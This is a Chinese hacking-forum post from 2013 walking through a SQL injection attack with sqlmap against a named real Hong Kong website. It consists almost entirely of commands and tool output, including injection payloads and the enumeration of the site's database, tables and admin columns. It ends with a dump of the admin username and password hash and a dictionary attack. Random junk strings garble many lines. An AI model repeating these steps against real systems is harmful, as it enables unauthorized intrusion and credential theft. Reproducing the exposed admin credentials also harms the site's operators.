找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2431|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db9 w! u& M! q$ h. e# K
ms "Mysql" --current-user       /*  注解:获取当前用户名称7 h# y1 p, m, F& u# V4 _! m/ L
    sqlmap/0.9 - automatic SQL injection and database takeover tool& F7 y8 O; V6 g9 W; N  y  g
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54" a/ x- w5 F# R3 n1 U# }
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    : s, S' \8 |* d session file& p  G. C" D# g/ ~
    [16:53:54] [INFO] resuming injection data from session file
    1 E+ b7 ^$ y; g( Z0 i2 ]4 H- [3 x8 A[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    3 G' h7 {' M0 o' _! T* |* g[16:53:54] [INFO] testing connection to the target url
    : ^8 r5 x) ?9 z  {+ s+ m' m: Y1 c2 wsqlmap identified the following injection points with a total of 0 HTTP(s) reque; `5 x. p4 t, k! H  |. _
    sts:) J$ ^) y" G  j5 i+ W5 N: \- W
    ---0 s2 {. L. L/ n# y
    Place: GET# a& H: i8 J5 Y- A( n: k
    Parameter: id( K- P" |# o$ W6 P
        Type: boolean-based blind
    3 v6 m' d8 D* D& K7 X: P    Title: AND boolean-based blind - WHERE or HAVING clause
    " b0 k. U/ v1 G# M. _+ L    Payload: id=276 AND 799=799
    / v- |8 n8 y$ L2 _5 U: r6 P$ w7 s    Type: error-based
    6 h# y6 l) `" B" w    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; W# n1 H9 N# I: b7 j- g- U6 ~
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,! M, ?' E4 Z& G4 E# a. ]
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: U, Q4 f6 q" X& y5 D
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 J; K5 _% b8 `( B! v1 d
        Type: UNION query* G7 i+ C* g3 @; e6 v  w$ t
        Title: MySQL UNION query (NULL) - 1 to 10 columns+ P% _$ |. v* q5 _$ M
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    4 U# g8 c. ~# b% S5 S& j(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ m# r& J% p! S+ |" P
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    , ]( i/ M2 R5 W: Q6 N) A    Type: AND/OR time-based blind
    * l# C; N- x$ b% }/ ]    Title: MySQL > 5.0.11 AND time-based blind( M$ _5 L! H" G) v+ W1 N" `4 A2 I
        Payload: id=276 AND SLEEP(5)9 Q) y* ~) S: ?4 |9 B- @
    ---" a8 g0 [% s! }8 w
    [16:53:55] [INFO] the back-end DBMS is MySQL  \9 b- T' `" X% s; I
    web server operating system: Windows
    # w! y" X" q2 U% W8 Iweb application technology: Apache 2.2.11, PHP 5.3.0
    + ]4 y7 F$ D" l" c0 zback-end DBMS: MySQL 5.0+ i3 k! ]/ H2 r' j2 D$ ^* r' [& ]# |7 i
    [16:53:55] [INFO] fetching current user
    $ e  i+ J+ |6 _* z7 ?6 a  V$ Zcurrent user:    'root@localhost'   ! N9 L, Y/ H* ^/ p$ f
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; _" n, \4 N% D
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58" M% i- E( Z- t, F/ n
    2 ]% z1 s# O! A+ ?1 G, w
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db0 E2 `3 T# b0 l1 U! x1 ~+ N
    ms "Mysql" --current-db                  /*当前数据库0 r6 X( k0 U2 X8 R( g; z$ I: x( Z
        sqlmap/0.9 - automatic SQL injection and database takeover tool7 X2 C, k( H2 t8 a  A& \" M$ Y% A8 N. y
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16+ }! v  C1 [: v2 a
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    : H5 K* \( e" G0 H, i( h session file
    ( E8 _  d6 B3 H$ t2 Q[16:54:16] [INFO] resuming injection data from session file
    8 n( o* y$ V3 X3 c3 Y! G, P[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    % x" p. G$ }3 t& [[16:54:16] [INFO] testing connection to the target url  w- E# c3 |' u! Z% D8 N
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    9 d/ X6 {1 E1 w/ d  |! zsts:2 ~4 m$ K+ m$ Q- f1 x$ K
    ---+ ^3 D0 ~3 C' _" `& D
    Place: GET0 z! P7 D1 m, C$ T$ F: [8 N; N
    Parameter: id
    - l- R. m7 I8 j: _9 w' v) z    Type: boolean-based blind
    $ Q$ r9 z" {. B' s) D9 a    Title: AND boolean-based blind - WHERE or HAVING clause
    7 v$ j6 K9 m( J    Payload: id=276 AND 799=799; k5 n7 X! O" |- ^. e/ F( ^' w( `0 j
        Type: error-based
      q) X, z; C" @: j    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ I. p5 o9 \" Y) W3 B4 m
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    1 q1 A' C# w( C1 G120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    1 R3 T* G8 ]; p" Q$ f# r),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ x/ |  ~0 _  W; j1 n  v
        Type: UNION query
    3 ~8 V3 K, }0 V: }1 J: H# U8 |    Title: MySQL UNION query (NULL) - 1 to 10 columns
    $ k: A, n2 R6 }    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 R+ \+ W0 I) e8 d. \4 i; o+ d1 G
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 Y2 t4 k) n6 ~/ t0 [! I
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    / ?* m. g  y8 W" o0 a    Type: AND/OR time-based blind0 Q: [) V5 `, w, B7 R; o
        Title: MySQL > 5.0.11 AND time-based blind- `/ b) Y) r. Z  y3 V# u0 ~7 L
        Payload: id=276 AND SLEEP(5)2 u* C( `: K, ^! A( B0 E
    ---7 a8 X* B+ U' Y0 O8 g
    [16:54:17] [INFO] the back-end DBMS is MySQL
      I, ^- |. [) j: Eweb server operating system: Windows
    9 ?8 s& Q8 y1 o/ |- Hweb application technology: Apache 2.2.11, PHP 5.3.0
    0 `9 y$ E# t. X" L- z/ c" Xback-end DBMS: MySQL 5.06 `4 ~5 H9 x( W6 H. \! U8 j& D$ m
    [16:54:17] [INFO] fetching current database; ]+ O* U9 B0 e' X
    current database:    'wepost'
    * j6 Y% y7 S* P1 \* b. _" G- m[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    9 p5 p' D# x3 V; `) z* p9 ]tput\www.wepost.com.hk'
  • shutting down at: 16:54:185 [$ M$ L2 O4 y: F3 R
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ W6 C: ^$ X# Z9 {: j9 l
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名) d* V' a' C( i# U$ Y, h; J
        sqlmap/0.9 - automatic SQL injection and database takeover tool* }2 M8 Z# |4 G9 M- }2 T" N* F$ n
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25" s  H+ I. m+ h3 P" V) F
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ) s6 j  n4 l1 O! _1 l  Z3 R session file! s4 E* G8 v+ R3 Q! q' p# [+ a* @
    [16:55:25] [INFO] resuming injection data from session file
    5 M0 I4 c7 T! w2 m2 X[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    - n2 p  n7 o, p- u3 F* ^[16:55:25] [INFO] testing connection to the target url' O* C/ u! l; Z$ E" O4 }/ l0 X
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque$ R1 I( Z2 E  }2 I! `6 f
    sts:+ L2 {' F# k8 Y, z0 y
    ---; G; _$ B! P2 p; j$ A4 h3 r
    Place: GET
    9 ]* d9 C$ W0 _+ z4 N8 t+ mParameter: id& }2 y, K! y2 K+ J/ T: p+ ?
        Type: boolean-based blind4 Q/ o% g3 \- l3 T& x
        Title: AND boolean-based blind - WHERE or HAVING clause0 G2 b8 Y2 C( o4 d' @
        Payload: id=276 AND 799=799
    7 l1 ~$ R; V- H, j* K4 ^2 w    Type: error-based* K6 v1 {2 i1 p6 h" T
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    : A* Y; h. ]% G    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 d# o9 K. l! c3 p( W
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
      |6 Q; ?& P8 w) U5 |: e),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# K* N3 E0 q5 z* t. t& C
        Type: UNION query$ j6 `7 R( }! u! D' P- c
        Title: MySQL UNION query (NULL) - 1 to 10 columns: w, _0 l0 v6 M' ~* e: ^& x
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    2 l: E$ N% `7 H/ W5 U(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    % [. t% E/ G, m+ u/ |7 G# xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: x8 ]/ S* O" B* v; d! _7 L! y
        Type: AND/OR time-based blind4 L9 O" z6 E7 e7 m9 d, y
        Title: MySQL > 5.0.11 AND time-based blind
    $ r7 U' z. F0 ]2 t    Payload: id=276 AND SLEEP(5)
    3 V1 R& [0 a' D* H& O+ u2 m---) [  {" ^4 E9 Q8 P) B6 j9 W8 G3 ~
    [16:55:26] [INFO] the back-end DBMS is MySQL
    9 c  i& [3 z2 [/ a( pweb server operating system: Windows
    $ Y! U: U1 t. P% nweb application technology: Apache 2.2.11, PHP 5.3.0
    8 A4 F) V7 C0 U' n( n- K5 cback-end DBMS: MySQL 5.04 E9 Q, J' D1 ?
    [16:55:26] [INFO] fetching tables for database 'wepost'
    / }0 w7 J. d5 [3 j[16:55:27] [INFO] the SQL query used returns 6 entries5 c6 m2 G" X; T& ~# c0 x
    Database: wepost. i8 O6 O# h% ~+ b# D
    [6 tables]7 v( n# s, v3 K6 W. e( C5 r
    +-------------+
    6 @; v4 ~% V7 t" J, E| admin       |. n7 a' p/ a- z
    | article     |& _! Z/ f1 d6 X
    | contributor |, U' ^% R' _  E' A, x- e
    | idea        |  }6 H( B/ l* b& ?! x1 s
    | image       |
    $ E2 A, p# _2 q, r| issue       |
    8 |; J& F$ H# _' t+-------------+
    , }9 X3 k! N0 t# `[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou( M4 g; d* T5 s/ A
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    - L& L7 [- S3 E% Q$ ^: d1 K. [, {. D2 q5 h
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 E" I" i- O- i- _2 [. l( x
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名4 x- s5 [  Z+ d- e- O7 p
        sqlmap/0.9 - automatic SQL injection and database takeover tool" J! z' U( }3 a$ r* R9 ]1 v; f
        http://sqlmap.sourceforge.net
  • starting at: 16:56:063 N8 N: Z* X4 f. P
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    0 r% R& p8 L2 w8 P, Q7 Tsts:( l% V; u8 l7 P  y( J. r5 E: |
    ---
    , @) d9 P+ E* g, Q0 {# p' ~Place: GET
    0 L6 e" h3 ^2 A: K0 _: CParameter: id4 ?% }, {: i/ _$ M4 \9 V
        Type: boolean-based blind
    8 b' g* ]" W# l+ g    Title: AND boolean-based blind - WHERE or HAVING clause
    3 I- y. j; q* W    Payload: id=276 AND 799=7999 ]: Z9 C: g) U  D4 y  p* _* L, o
        Type: error-based( p" w1 A9 f: m: K2 q5 V7 l8 X
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' B6 w/ p% [! \3 A  w
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    + b- m. W4 u. f. i* k120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* m  a2 |6 a! E( P$ G
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 W+ m- [# L7 \# N
        Type: UNION query
    ) u$ q. |& G5 V    Title: MySQL UNION query (NULL) - 1 to 10 columns
    . U4 \# z' e7 q2 W0 T    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    $ p+ U  G5 e3 r& B7 K(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! _! o9 ^. d/ ]/ i1 }. g' q
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, C0 C4 f  X+ N* R  y& h5 ^
        Type: AND/OR time-based blind# G9 G* O6 n6 i2 Z# V: b
        Title: MySQL > 5.0.11 AND time-based blind
    - i7 [/ Q& u7 g! ^0 [    Payload: id=276 AND SLEEP(5); R+ a- H/ n0 G$ Q* R; Y, p$ W
    ---
    , Z. v4 l/ j! \: j) {web server operating system: Windows
    # y& a3 y5 B8 @" v1 O+ \6 m; K7 T, Tweb application technology: Apache 2.2.11, PHP 5.3.0
    1 R" F+ Z; S, o, lback-end DBMS: MySQL 5.02 f# ?9 }  `4 n; Z* ]$ _
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se7 L! i, F2 W( z  d0 Y/ r
    ssion': wepost, wepost. y- @9 G4 v( w1 N5 S: B  F" E
    Database: wepost9 u9 Y2 y! f. l' G& w
    Table: admin2 S* L7 N  V& S! e: @
    [4 columns]$ {. ^# S, K3 p  F/ G
    +----------+-------------+0 H0 K2 ^* c" m& n  }
    | Column   | Type        |
    , v( J! e6 R9 h+ x4 b+----------+-------------+
    ; Z* Q4 C' J  i8 c* ]| id       | int(11)     |. P% h) X5 c  C4 ^7 g# X* ]
    | password | varchar(32) |, v8 M' ]$ s* A) r
    | type     | varchar(10) |
    8 M* H% @4 B& Z| userid   | varchar(20) |/ p+ Y( Y) r  t5 x
    +----------+-------------+- M$ C. R2 N3 X% D' ~9 O: N) V" j
  • shutting down at: 16:56:19& Z/ X0 Q8 o6 C9 x8 j) ]

    3 c* G% D/ T6 |1 a0 v5 HD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db  g/ k% a# h7 H% ~) ~
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    - w% ?2 `9 S2 p. i. b    sqlmap/0.9 - automatic SQL injection and database takeover tool# V& j* n! Y: R* }& `: I$ M
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14$ O2 ]' F/ G/ S% v9 c
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque7 h* {" s* ], D7 U
    sts:
    8 `. L+ T6 g$ i0 W' `---6 `4 o8 J) e, x8 k- `
    Place: GET' y5 {9 d- ^) o6 S" I% L
    Parameter: id
    4 s* M( N% o) V- A* C$ N+ X! g! l& ~    Type: boolean-based blind
    % ^5 Z7 K6 k7 B5 c; x4 ^7 C$ w    Title: AND boolean-based blind - WHERE or HAVING clause& Z, a6 E3 L& R* `: k% }6 J) X
        Payload: id=276 AND 799=799
    4 `6 J% Q: T  y( V* [    Type: error-based0 u0 _4 O. I0 m
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ) Y! I7 {* M& Q    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    8 u" d  i6 g6 S120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# w4 R9 }8 d$ b0 D6 Y
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    4 }8 E" Z5 s' J7 ]4 V8 x6 y, p    Type: UNION query/ O! H1 m1 ^; R& \* ?
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    % Q! x7 q2 {+ v! ~    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, ]  Y0 h: y0 x% ~/ F- b
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    4 @. Z) i; h) ?' cCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    - t. O/ R' x$ ?! f  V5 i# B    Type: AND/OR time-based blind
    4 z9 W4 H" K: ?' J    Title: MySQL > 5.0.11 AND time-based blind
    $ i* H9 f1 @9 f% Z: A( k$ [+ K    Payload: id=276 AND SLEEP(5)
      K& \) G& ?) k; `---6 g+ c1 g2 y, ^' v: e# v. D+ i( F4 E
    web server operating system: Windows2 ^* X- C: E4 e0 m6 _# I0 ]
    web application technology: Apache 2.2.11, PHP 5.3.0
    - T: A2 R' V6 B; R: sback-end DBMS: MySQL 5.0% \& ?1 {4 d1 `( y- B
    recognized possible password hash values. do you want to use dictionary attack o5 T( |7 J3 h* z& A9 M
    n retrieved table items? [Y/n/q] y
    ( k# R# G9 r! t8 q4 ewhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]. ~( N+ z' d& K0 N6 b
    do you want to use common password suffixes? (slow!) [y/N] y
    5 F1 H- k% b5 {% Y8 _; a% }/ V6 {$ cDatabase: wepost* N& ~$ T" V5 J$ T
    Table: admin
    , p5 w' [' t4 ?[1 entry]; v$ y' E" ]/ V5 h" i# Z
    +----------------------------------+------------+
    9 O. x0 g) Y5 n4 b2 H2 w4 Q+ S| password                         | userid     |
    8 v1 m7 c: a" B; D2 b% h* Y, ^* D( r+ Y6 c+----------------------------------+------------+
    3 `+ r4 |8 |& h3 X$ P/ x| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    : `) |6 n0 [: N+----------------------------------+------------+! c: ?# j+ @- q% e9 W9 o
  • shutting down at: 16:58:14
    , F5 h8 e; E; G4 N3 t% j; F/ {) Y; \. \# }
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表